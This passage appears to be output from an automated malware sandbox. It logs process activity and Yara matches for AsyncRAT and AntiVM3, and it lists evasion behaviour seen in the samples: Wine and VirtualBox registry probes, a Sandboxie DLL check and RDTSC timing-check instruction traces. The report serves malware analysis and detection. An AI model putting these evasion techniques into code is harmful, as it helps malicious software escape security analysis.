Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AD13C second address: 4AD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AD142 second address: 4AD162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10A35F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BC10A3603h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC2D1 second address: 4AC2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5BC10B7098h 0x0000000b pushad 0x0000000c js 00007F5BC10B7096h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F5BC10B7096h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC2F2 second address: 4AC305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5BC10A360Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC305 second address: 4AC309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC309 second address: 4AC30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC459 second address: 4AC45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC59C second address: 4AC5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F5BC10A35FEh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5BC10A35F6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F5BC10A35FEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AC729 second address: 4AC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0A7 second address: 4AF0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0B1 second address: 4AF0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0B5 second address: 4AF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10A360Fh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10A3607h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10A3604h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF0FD second address: 4AF107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10B709Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF206 second address: 4AF20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF20B second address: 4AF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 298AC1A2h 0x0000000e mov edx, dword ptr [ebp+122D33FEh] 0x00000014 push 00000003h 0x00000016 mov di, 0B90h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5BC10B7098h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D353Ah] 0x0000003c mov si, 1EC8h 0x00000040 push 00000003h 0x00000042 sub di, E20Bh 0x00000047 push 49B6E6D2h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F5BC10B709Bh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF269 second address: 4AF26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF26E second address: 4AF296 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10B709Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7649192Eh 0x00000011 mov edx, 2B29BBECh 0x00000016 lea ebx, dword ptr [ebp+12453FD8h] 0x0000001c push eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF3F0 second address: 4AF3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF3F4 second address: 4AF3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF3FE second address: 4AF422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4AF46C second address: 4AF475 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4C24FD second address: 4C2503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE5E4 second address: 4CE609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F5BC10B70A3h 0x0000000d jnc 00007F5BC10B7096h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE609 second address: 4CE617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10A35F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE8AC second address: 4CE8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CE8B2 second address: 4CE8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1A3 second address: 4CF1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1A9 second address: 4CF1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1AD second address: 4CF1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1B1 second address: 4CF1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007F5BC10A35F6h 0x0000000d jnl 00007F5BC10A35F6h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1C5 second address: 4CF1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F5BC10B7096h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF1D9 second address: 4CF1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF46C second address: 4CF48E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BC10B70A4h 0x0000000d js 00007F5BC10B7096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 493A8E second address: 493AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 493AA6 second address: 493AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 493AAA second address: 493AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jne 00007F5BC10A35F6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4CF61E second address: 4CF633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10B709Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A6250 second address: 4A6256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A6256 second address: 4A6260 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BC10B7096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A6260 second address: 4A629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F5BC10A35F6h 0x0000000d jc 00007F5BC10A35F6h 0x00000013 ja 00007F5BC10A35F6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007F5BC10A3606h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A629D second address: 4A62B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A3h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 49BFA5 second address: 49BFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC292 second address: 4DC29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC29C second address: 4DC2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC866 second address: 4DC873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F5BC10B7096h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC873 second address: 4DC87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DC9F7 second address: 4DC9FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE29C second address: 4DE2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2A0 second address: 4DE2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2A6 second address: 4DE2CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BC10A35FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F5BC10A35F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2CA second address: 4DE2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F5BC10B709Eh 0x0000000f je 00007F5BC10B7098h 0x00000015 push edi 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE2EB second address: 4DE2F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE40E second address: 4DE414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
